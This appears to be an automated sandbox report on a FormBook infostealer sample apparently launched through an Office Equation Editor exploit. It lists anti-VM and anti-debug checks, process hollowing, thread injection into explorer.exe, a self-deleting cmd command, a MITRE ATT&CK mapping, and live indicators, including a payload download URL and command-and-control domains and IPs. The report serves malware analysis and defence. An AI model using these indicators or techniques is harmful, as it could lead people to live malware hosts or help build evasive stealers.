Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1916	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3024	Thread sleep time: -62000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2952	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed

Source: explorer.exe, 00000006.00000000.2115515210.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000002.2363489072.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2115552459.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000006.00000000.2115450863.00000000041DB000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.2106311977.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe

Code function: 5_2_0040ACD0 LdrLoadDll,

5_2_0040ACD0

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe

4_2_012C1B13

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe

4_2_012C1B13

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe

4_2_012C1B13

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_012B6A00 mov eax, dword ptr fs:[00000030h]	4_2_012B6A00
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_0046F839 mov eax, dword ptr fs:[00000030h]	4_2_0046F839
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_0046EDE2 mov eax, dword ptr fs:[00000030h]	4_2_0046EDE2
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_0046F651 mov eax, dword ptr fs:[00000030h]	4_2_0046F651
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_0046F6F1 mov eax, dword ptr fs:[00000030h]	4_2_0046F6F1
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_0046F68E mov eax, dword ptr fs:[00000030h]	4_2_0046F68E
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_012B6A00 mov eax, dword ptr fs:[00000030h]	5_2_012B6A00
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009226F8 mov eax, dword ptr fs:[00000030h]	5_2_009226F8
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A126F8 mov eax, dword ptr fs:[00000030h]	7_2_00A126F8

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe

Code function: 4_2_012B6B80 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc,

4_2_012B6B80

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_012BC0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_012BC0A3
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_012BC080 SetUnhandledExceptionFilter,	4_2_012BC080
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_012BC0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_012BC0A3
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_012BC080 SetUnhandledExceptionFilter,	5_2_012BC080

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe

Network Connect: 91.195.240.94 80

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Section loaded: unknown target: C:\Users\user\AppData\Roaming\mpomboby8423.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Thread register set: target process: 1388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe

Section unmapped: C:\Windows\SysWOW64\help.exe base address: 310000

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\mpomboby8423.exe C:\Users\user\AppData\Roaming\mpomboby8423.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Process created: C:\Users\user\AppData\Roaming\mpomboby8423.exe C:\Users\user\AppData\Roaming\mpomboby8423.exe	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\mpomboby8423.exe'	Jump to behavior

Source: explorer.exe, 00000006.00000002.2363678883.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000002.2363678883.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.2363489072.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.2363678883.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe

Code function: 4_2_012BD7B7 cpuid

4_2_012BD7B7

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe

Code function: 4_2_012B8431 GetLocalTime,

4_2_012B8431

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2363397604.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2136966268.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2137046396.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2104089442.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2363479849.0000000000250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.mpomboby8423.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mpomboby8423.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpomboby8423.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpomboby8423.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2363397604.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2136966268.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2137046396.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2104089442.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2363479849.0000000000250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.mpomboby8423.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mpomboby8423.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpomboby8423.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpomboby8423.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter2	Path Interception	Process Injection512	Rootkit1	Credential API Hooking1	System Time Discovery1	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	LSASS Memory	Security Software Discovery251	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer13	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion2	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution13	Logon Script (Mac)	Logon Script (Mac)	Process Injection512	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol22	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information3	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing1	DCSync	System Information Discovery113	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mpomabiva[1].exe	100%	Avira	HEUR/AGEN.1106536
C:\Users\user\AppData\Roaming\mpomboby8423.exe	100%	Avira	HEUR/AGEN.1106536
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mpomabiva[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\mpomboby8423.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mpomabiva[1].exe	37%	ReversingLabs	Win32.Trojan.Pwsx
C:\Users\user\AppData\Roaming\mpomboby8423.exe	37%	ReversingLabs	Win32.Trojan.Pwsx

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.mpomboby8423.exe.280000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
5.2.mpomboby8423.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://vm1662026.3ssd.had.wf/mpomabiva.exe	0%	Avira URL Cloud	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/	0%	Avira URL Cloud	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://p.zhongsou.com/favicon.ico	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
vm1662026.3ssd.had.wf	92.119.114.220	true	true	unknown
www.ghelyoun.net	91.195.240.94	true	true	unknown
www.aboutwheelchair.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://vm1662026.3ssd.had.wf/mpomabiva.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1	explorer.exe, 00000006.00000000.2115416675.00000000041AD000.00000004.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.iis.fhg.de/audioPA	explorer.exe, 00000006.00000000.2116151786.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sogou.com/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.msn.com/?ocid=iehpme2	explorer.exe, 00000006.00000000.2115552459.0000000004263000.00000004.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	explorer.exe, 00000006.00000000.2126479275.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.msn.com/?ocid=iehps	explorer.exe, 00000006.00000000.2122869349.000000000842E000.00000004.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.windows.com/pctv.	explorer.exe, 00000006.00000000.2113776918.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abril.com.br/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.naver.com/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
